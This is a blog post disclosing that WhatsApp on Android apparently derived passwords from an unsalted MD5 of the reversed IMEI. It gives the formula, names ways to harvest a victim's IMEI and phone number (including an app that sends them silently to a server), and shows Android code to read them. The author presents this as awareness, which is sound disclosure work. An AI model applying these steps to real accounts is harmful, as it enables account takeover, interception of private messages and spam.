WhatsApp is using IMEI numbers as passwords

As you probably already heard in recent news, 1,000,001 Apple UDID’s were leaked. It’s unfortunate that so many apps use UDID’s to identify users since it’s extremely insecure.

This brings me to WhatsApp, a free messaging service, used by millions of people. Their system runs on a modified version of XMPP (Extensible Messaging and Presence Protocol). There is nothing wrong with using XMPP, but there is a problem in how WhatsApp handle authentication.

If you installed WhatsApp on an Android device for example, your password is likely to be an inverse of your phones IMEI number with an MD5 cryptographic hash thrown on top of it (without salt).

md5(strrev(‘your-imei-goes-here’))

When I say Android, I don’t exclusively mean Android. It just happens to be a different case when it comes to iOS. Windows Mobile, Blackberry etc… might very well have the same password method. It actually wouldn’t surprise me. WhatsApp on the iPhone might be using your IMEI too, or maybe UDID’s to generate passwords, but not the exact same method. If I do find out, I will update this post.

Then comes the username. It’s your phone number (doh).

To obtain both these values is rather simple.

Examples:
1. You have direct access to your victims phone, in which case you dial & call *#06# (in most cases) and you’ve got their IMEI number.
2. You develop an app that silently sends the victims IMEI number to your server in the background (many applications do this already) & phone number, either by letting them fill it in themselves in a registration part of your app, or also silently (this method however isn’t always airtight but works in a lot of cases).
3. A hacker leaks a database/file with IMEI numbers with associated phone numbers, ding ding ding!
4. A spammer buys this information from an app developer.

Time for some Android code examples..

Android code example to retrieve IMEI number:
TelephonyManager tm = (TelephonyManager) getSystemService(Context.TELEPHONY_SERVICE);

String device_id = tm.getDeviceId();

To retrieve the victims phone number:
TelephonyManager tMgr =(TelephonyManager)mAppContext.getSystemService(Context.TELEPHONY_SERVICE);
mPhoneNumber = tMgr.getLine1Number();

You can also retrieve the users voicemail number too just in case:
TelephonyManager.getCompleteVoiceMailNumber()

Using this information allows you to intercept and send messages from your victims account.

This could mess up peoples lives if you use their account to send a message to someone they know, with any kind of f’ed up message. This could cause huge problems for your victim, especially if the receiver of the message is mentally unstable. It might sound dramatic, but it’s feasible.

You could intercept naked photos & other sensitive personal messages.

Alternatively, you could just spam the hell out of WhatsApp, especially if you have a nice big database.

Is this already happening? It wouldn’t surprise me if it is. I’ve succeeded in sending/receiving messages (from friends accounts who gave me permission to take their accounts over) and I’m not even a “hardcore hacker”.

Do you use WhatsApp? Think twice before you send a private WhatsApp message. Think twice when you receive a messed up WhatsApp message. You don’t know what’s going on in the background.

And WhatsApp, if you are reading this, get your act together. People expect a secure system when it comes to personal messaging. And with the amount of customers you have, you should be taking better security measures. I sincerely hope you fix this issue soon.

The intent of this blog post is not give “hackers” or “scriptkiddies” any funny ideas, but merely for awareness.

Ps. Don’t get me wrong, I love WhatsApp. But it’s far from “secure”.

Want to talk along? Got any further questions? Comment below, or on Hacker News.

– UPDATE –
It seems that WhatsApp has made a change in their authentication system. I am not sure what they exactly changed, but if I find out more I will let you all know. My method no longer works.

 

– UPDATE 2 –
It looks like they didn’t change all that much…

– UPDATE 3 –
Ezio Modio claims to have found how WhatsApp passwords are generated for iOS. I’m yet to test it, but sounds promising. http://www.ezioamodio.it/?p=29

– PUBLICITY –
The Next Web
Globo.com
Security.nl
Slashdot.org
H-Online.com
WebWereld.nl
Welt.de
PCWelt.de
Leggo.it
Corriere.it

709 Words
248760 Views